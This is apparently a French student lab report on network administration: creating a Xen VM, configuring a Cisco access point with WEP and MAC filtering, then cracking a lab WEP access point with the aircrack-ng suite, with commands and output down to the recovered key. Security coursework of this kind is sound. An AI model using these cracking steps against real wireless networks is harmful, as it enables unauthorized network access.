TP sysres IMA2a5 2016/2017 G3
Sommaire
Machine virtuelle
Le but est de créer une machine virtuelle Xen Linux sur le dom0 cordouan.insecserv.deule.net
Création de la machine
xen-create-image --hostname Gringe --ip 193.48.57.180 --netmask 255.255.255.240 --dir /usr/local/xen
Lancement de la machine
xl create Gringe.cvg
Connexion à la machine
xl console Gringe
Configuration des paramètres de la carte réseau. On modifie le fichier /etc/network/interfaces
# The loopback network interface auto lo iface lo inet loopback # The primary network interface auto eth0 iface eth0 inet static address 193.48.57.180 netmask 255.255.255.240 gateway 193.48.57.190
Point d'accès Cisco
Pour configurer la borne d'accès Wi-Fi Cisco, on commence par la connecter à un port USB du pc via un adaptateur. On repère ensuite sur quel port on s'est connecté
dmesg | grep tty
On se connecte sur la borne à l'aide de minicom. Il ne faut pas oublier de passer en root d'abord.
su minicom -os
Une fois minicom démarré, il faut modifier certains paramètres pour pouvoir communiquer
A - Serial Device : /dev/ttyUSB0 B - Lockfile Location : /var/lock C - Callin Program : D - Callout Program : E - Bps/Par/Bits : 9600 8N1 F - Hardware Flow Control : No G - Software Flow Control : No
Maintenant on se connecte en root sur le Cisco
enable config terminal
Puis on configure de SSID et le mot de passe
ap(config)#dot11 ssid Pocahontas ap(config-ssid)#dot11 ssid Pocahontas ap(config-ssid)#authentication open ap(config-ssid)#guest-mode ap(config)#interface dot11Radio0 ap(config-if)#ssid Pocahontas ap(config-if)#encryption key 1 ap(config-if)#encryption key 1 size 40bit 0 0123456789 transmit-key ap(config-if)#encryption mode Wep mandatory
On souhaite sécuriser la connexion en n'autorisant que certaines adresses MAC à se connecter. Pour cela on repère d'abord notre adresse MAC
su ifconfig
Sur les eeePC on regarde HWaddr de l'interface wlan0. Par exemple sur ce PC pour l'interface eth0 cela ressemble à ça
eth0 Link encap:Ethernet HWaddr 00:22:4d:7a:ea:a1 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:19569 errors:0 dropped:166 overruns:0 frame:0 TX packets:4408 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:10043846 (9.5 MiB) TX bytes:543435 (530.6 KiB) Interrupt:20 Memory:f6500000-f6520000
Enfin on refuse toutes les connexions sauf celles qui on la bonne adresse
ap(config)#access-list 701 permit 0022.4d7a.eaa1 0000.0000.0000 ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff
Une fois la point d'accès configuré, on peut connecter l'eeePC à la borne. Pour cela on commence par modifier le fichier /etc/network/interfaces
# The loopback network interface auto lo iface lo inet loopback auto wlan0 iface wlan0 inet dhcp wireless-mode managed wireless-essid Pochontas wireless-key 0123456789
Attaque d'un point d'accès WEP
Pour cette attaque on utilise aircrack-ng. On démarre sur notre interface Wi-Fi.
airmon-ng start wlan2
On scan le réseau
airodump-ng wlan2
On souhaite attaquer la cracotte03, on se focalise donc dessus.
airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack
On observe CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre>
Pour augmenter le nombre de paquet qui transitent, on va stimuler la borne. Pour cela on ouvre un autre terminal et on utilise airplay.
aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2
Pour trouver la clé, on ouvre un autre terminal et on utilise aircrack-ng
aircrack-ng crack.cap Aircrack-ng 1.2 beta3 [00:00:39] Tested 257766 keys (got 32866 IVs) KB depth byte(vote) 0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) 1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) 2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) 3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) 4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) 5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) 6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) 7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) 8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) 9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) 10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) 11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) 12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] Decrypted correctly: 100%
Attaque d'un point d'accès WPA/PSK
Cette fois-ci il va falloir fournir un dictionnaire à aircrack-ng pour qu'il "brut force" le point d'accès. Pour simplifier, on a décider que le mot de passe du point d'accès sera uniquement composé de chiffres.